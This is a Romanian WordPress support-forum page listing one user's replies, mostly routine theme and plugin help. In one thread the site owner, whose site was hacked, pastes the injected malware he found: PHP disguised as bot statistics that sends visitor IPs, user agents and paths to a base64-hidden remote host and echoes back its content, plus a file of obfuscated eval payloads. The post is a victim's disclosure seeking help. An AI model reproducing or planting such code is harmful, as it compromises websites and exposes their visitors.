Stefan3v

Am creat răspunsuri în forum

Vizualizare 14 răspunsuri - 1 la 14 (din 14 în total)
  • Forum: Probleme și soluții
    În răspuns la: aplicatie "dubioasa" JAVA
    Inițiator fir de discuții Stefan3v

    (@stefan3v)

    acum 13 ani

    am descarcat tot site-ul la mine in calculator si am cautat in toate filele .php, cu notepad++, linia „// This code use for global bot statistic”. Observ ca a dat rezultate dar tot nu stiu provenienta „virusului”. Problema ce ma ingrijoreaza este ca toate site-rile memorate in filezilla au continut acest „virus”.

    Forum: Probleme și soluții
    În răspuns la: aplicatie "dubioasa" JAVA
    Inițiator fir de discuții Stefan3v

    (@stefan3v)

    acum 13 ani

    codul este aici http://ro.forums.wordpress.org/topic/aplicatie-dubioasa-java?replies=7#post-3368 si se afla in mai multe fisiere .php din tot site-ul.
    Am ceva de munca sa-l curat si tot nu sunt convins ca nu se mai repeta „isprava” atata timp cat nu identific sursa problemei.

    Forum: Probleme și soluții
    În răspuns la: aplicatie "dubioasa" JAVA
    Inițiator fir de discuții Stefan3v

    (@stefan3v)

    acum 13 ani

    la o simpla cautare pe google mi-am dat seama ca problema nu este doar imagineatia mea.
    http://www.google.ro/#output=search&sclient=psy-ab&q=%3F%3E%3C%3Fphp+if+%28!isset%28%24sRetry%29%29+{+global+%24sRetry%3B+%24sRetry+%3D+1%3B+++++%2F%2F+This+code+use+for+global+bot+statistic++++&oq=%3F%3E%3C%3Fphp+if+%28!isset%28%24sRetry%29%29+{+global+%24sRetry%3B+%24sRetry+%3D+1%3B+++++%2F%2F+This+code+use+for+global+bot+statistic++++&gs_l=hp.12...485.14209.0.15501.2.2.0.0.0.0.0.0..0.0...0.2...1c.1.7.psy-ab.Oq6inTl44-8&pbx=1&bav=on.2,or.r_qf.&bvm=bv.44158598,d.ZWU&fp=efd6ef96c9ff7b6e&biw=1280&bih=841 (copy/paste in bara de adrese)

    Forum: Probleme și soluții
    În răspuns la: aplicatie "dubioasa" JAVA
    Inițiator fir de discuții Stefan3v

    (@stefan3v)

    acum 13 ani

    in wp-content am index.php cu urmatoarele linii:

    <?php
// Silence is golden.
?><?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics
        $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink );
    }
    }
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
    $sResult = @curl_exec($stCurlHandle);
    if ($sResult[0]=="O")
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle);
}
}
?>

    am modficat extensia la counter.php si la index.php (sa le scot din „joc”) si am pus index.php original din WP dar problema persista.

    p.s: m-am enervat si am sters tot de pe FTP, am backup.

    Forum: Probleme și soluții
    În răspuns la: aplicatie "dubioasa" JAVA
    Inițiator fir de discuții Stefan3v

    (@stefan3v)

    acum 13 ani

    ce-a mai enervanta treaba e ca acea adresa se tot schimba in fiecare zi.
    Am facut un back-ul la toate fisierele de pe server si o sa incerc sa ma uit prin ele, desi nu cred ca o sa gasesc ceva.
    Nu pot asocia anomalia cu un eveniment anume, instalasem un countdown si parca de atunci mi-a aparut ceva de java dar nu sunt sigur.
    Mai multe persoane mi-au spus ca site-ul emu cintine virusi si cand i-am rugat sa mai verifice au zic ca nu mai primesc avertismentul respectiv.
    Partea interesanta este ca eu mai am in clientul de FTP inregistrat un site, pe o cu totul alta platoforma, am observat ca si acolo se intampla acelasi lucru. Pe respectivul site nimic nu are legatura cu wordpress-ul asa ca nu o sa-i dau numele.
    La un moment dat am gasit pe serverul meu un fisier „counter.php”, continea niste comentarii ca ar fi fost generat de server si niste variabile total anapota ex: xpagjs1v4dq79……
    Am scanat site-ul meu cu toate programele online si degeaba, nu au gasit nimic.
    Posibil sa fie ceva injecta si-n baza de date?

    p.s: am dat iar de counter.php desi il stersesem:

    <?php
//Counter V.2.35
//Generated by server
//Do not delete
eval(gzuncompress(base64_decode('eF6lUsFqwkAU/JUeCqtQiiS1ECQHe0ikCJJt0exKCdlNFNKIYkBIvl7nJYVqnicPmbfsvDczu5vncL74mM6/1iJJ000ifvzp8ZjWA5NW+ftbkuV2n+UDYcXTq3AlsAZkoVcZl1YlkPitD/TF8OV22pW1vXwM0+qSJt/xx1hyYzXuqxNDcwDOH6nueiPRA6nIk59Xu6DR4L/VKHYoYakc71dHPnN/WfyJlkqvxqiFceg8Zf8+sX3prlD1CjgugKbz6E/80+46JaMLzWs9rkvByl3WBjXwDmZHP8eo76rQFXgN5YzlCdXOIubsYKi71Wx0jIU82RkqN9Fpgy5zYAhYFkwKEG2SwoRdmgibeIXh5AxE9+BR'))); ?><? eval(gzuncompress(base64_decode('eF5Vj9tqg0AQhl8liGQT8ELMVQmhCG60kmizMdS0FBnPS3RXVrclCX33rrE3vZmPOf3zTylZNlDOZgDlQqfLuw4bWwi4LpAXRa/J6YhJYrs4iJChaQaqOK+aAhnoCjXniinQXCq2PVORd4UAxawWvB3HUsoqhR5KEHTM+aDiQ5rgLSaYTLoE78MIJ7bjqMLU98KjOorAI2bm8K+dlfep5dep61/TVX57j/1b7m5NiAMT3vbybD0Nu1VgnmPiTTzIzK2/lcQz7TYK/2/MZa+8VgUbxt485y1QxqAtxvRh8M/AvJRN08FQTxqHEz5GyYm8jFtZXWSXsd5wflGfhJqhzbTlWhSDFGymw4dOP9c/v836bFU='))); ?><? eval(gzuncompress(base64_decode('eF6FlG1rgzAQgP+KhWINK8Mk1rZIYN1wZeDaYXVfRMRtuhXKCn3Zl+J/30VTNTSQT4bkubtw98RtaQ22x2NxsoZ5Xv5lNkKX793+I98ZYsMTX3bYn3+/LPsOI7GF2XAZrB8XwSYZZRCdjdLETq1htvHDdz9MYMuyUXrFCVvFQSBiKeOnkGpbWtZtGgxp6vvgMecIQowZZb47Fsg0FTyRearjqcw7Ot6R+YmOn8i8q+NdmZ/q+KnMz3T8TObnOn4u8xi06A1AmjDGKB0004QxXWCewqe+BpiCB5DhdDgXhmkaKsTpEHRppk8VhmFQrHYHhmDc1ysXFgqHuETSJaZQQYTM1CGdR1dwrga5QP3chIve5CZYHcIdkkJIF0Ih5NqTpR/VT4fwhojnQlSNaCWjyKsqaHzTNGIMoNP8rUEbbx4oblUj46c4DNZvURb6URyuonCx2jz74bh76FD+NkHrXpcgenn113HURoLv4uIOe1CkaHUk9Q+gubeTiMIoZbVPBCYsROif1Ucu8orPn734STlepajSSgxVquofilhu0g=='))); ?>
    Forum: Probleme și soluții
    În răspuns la: aplicatie "dubioasa" JAVA
    Inițiator fir de discuții Stefan3v

    (@stefan3v)

    acum 13 ani

    trebuie incercat din mozila firefox, in chrome nu zice nimic.
    daca in firefox nu este instalat plugin-ul Java o sa apara doar pop-up pentru instalarea Java Runtime Environment.
    ce imi apare in IE daca nu am java instalat:
    oi49.tinypic.com/e1bzlx.jpg
    La urmatoare intrare pe blog nu imi mai apare avertismentul pana nu imi schimb IP-ul!.

    Forum: Probleme și soluții
    În răspuns la: Hacked…
    Stefan3v

    (@stefan3v)

    acum 13 ani, 3 luni

    sigur nu e de la hosting? posteaza aici domeniul blogului tau, nu cred ca se considera reclama.

    Forum: Probleme și soluții
    În răspuns la: Vreau sa schimb baza de date
    Stefan3v

    (@stefan3v)

    acum 13 ani, 5 luni

    pai si nu imi spui o adresa ceva?
    sau cum dau de tine? nu am globul de cristal pornit.

    Forum: Probleme și soluții
    În răspuns la: Vreau sa schimb baza de date
    Stefan3v

    (@stefan3v)

    acum 13 ani, 5 luni

    te ajut eu moka!

    Forum: Probleme și soluții
    În răspuns la: Cum se poate pune poza la user
    Stefan3v

    (@stefan3v)

    acum 13 ani, 10 luni

    iti instalezi un modul numit chiar: Avatars si la meniul utilizatori -> profilul tau iti poti incarca avatarul. O metoda mult mai simpla e sa te inregistrezi la gravatar.com cu adresa ta de email si sa ii asociezi un avatar, pe orice wp vei posta cu adresa respectiva de email vei avea avatarul respectiv.

    Forum: Probleme și soluții
    În răspuns la: continut slider
    Stefan3v

    (@stefan3v)

    acum 13 ani, 10 luni

    Dupa primul paragraf apesi butonul: Insert More Tag sau de la tastatura ALT + SHIFT + T si in articol o sa iti apara Citeşte mai departe…
    Numai bine.

    Forum: Probleme și soluții
    În răspuns la: utilizare plugins WP-EasyArchives
    Inițiator fir de discuții Stefan3v

    (@stefan3v)

    acum 13 ani, 10 luni

    Gata, am reusit sa rezolv si problema din iNove.

    linia asta din css /*background:#FFF url(img/sidesep.gif) right repeat-y;*/
    a devenit background:#FFF url(img/sidesep.gif) 680px repeat-y; tema arata cum imi doresc.

    Multumesc comunitatii wordpress Romania si la cat mai multi membrii.

    Forum: Probleme și soluții
    În răspuns la: utilizare plugins WP-EasyArchives
    Inițiator fir de discuții Stefan3v

    (@stefan3v)

    acum 13 ani, 10 luni

    Am comentat liniile respective si acum butoanele arata perfect
    Multumesc Dan!

    p.s: ulterior pusesem tema iNove si butonenele erau ok dar nu am stiu sa modific pozitia unei linii verticale http://i45.tinypic.com/30dh07k.png
    am reusit sa fac mai lata zona de continut (unde sunt articolele) si sa ingustez sidebarul (unde sunt widgeturile) dar linia aia gri verticala ramane „in urma” (pe pozitia ei actuala). Ma poti ajuta si in acesta problema? Multumesc!

    Forum: Probleme și soluții
    În răspuns la: utilizare plugins WP-EasyArchives
    Inițiator fir de discuții Stefan3v

    (@stefan3v)

    acum 13 ani, 10 luni

    am incercat sa fac o comparatie intre ce e la mine acum si ce trebuie sa fie (ca aspect al butoanelor)

    [IMG]http://i50.tinypic.com/154hcew.jpg[/IMG]

    daca scot <div id=”content-body”> butoanele sunt afisate corect dar restul paginii e dezastru.

Vizualizare 14 răspunsuri - 1 la 14 (din 14 în total)